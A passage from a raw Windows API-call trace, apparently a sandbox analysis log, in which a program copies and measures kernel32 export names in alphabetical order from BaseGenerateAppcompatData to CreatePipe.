(lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.796] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.796] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.796] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.796] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.796] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.796] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.796] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.796] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.796] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.797] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.797] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.797] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.797] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.797] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.797] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.797] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.797] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.797] lstrlenA (lpString="BEEP") returned 4 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.797] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.797] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.797] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.797] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.797] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.797] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.797] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.797] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.797] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.797] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.798] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.798] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.798] lstrlenA (lpString="CANCELIO") returned 8 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.798] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.798] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.798] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.798] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.798] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.798] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.798] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.798] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.798] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.798] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.799] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.799] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.799] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.799] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.799] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.799] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.799] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.799] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.799] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.799] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.799] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.799] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.799] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.799] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.799] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.799] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.799] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.799] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.799] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.800] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.800] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.800] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.800] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.800] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.800] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.800] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.800] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.800] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.800] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.800] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.800] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.800] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.800] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.800] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.800] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.800] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.800] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.800] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.801] lstrlenA (lpString="COPYFILEA") returned 9 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.801] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.801] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.801] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.801] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.801] lstrlenA (lpString="COPYFILEW") returned 9 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.801] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.801] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.801] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.801] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.801] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.801] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.801] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.801] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.801] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.801] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.801] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.801] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.801] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.802] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.802] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.802] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.802] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.802] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.802] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.802] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.802] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.802] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.802] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.802] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.802] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.802] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.802] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.802] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.802] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.802] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.802] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.802] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.802] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.803] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.803] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.803] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.803] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.803] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.803] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.803] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.803] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.803] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.803] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.803] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.803] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.803] lstrlenA (lpString="CREATEPIPE") returned 10 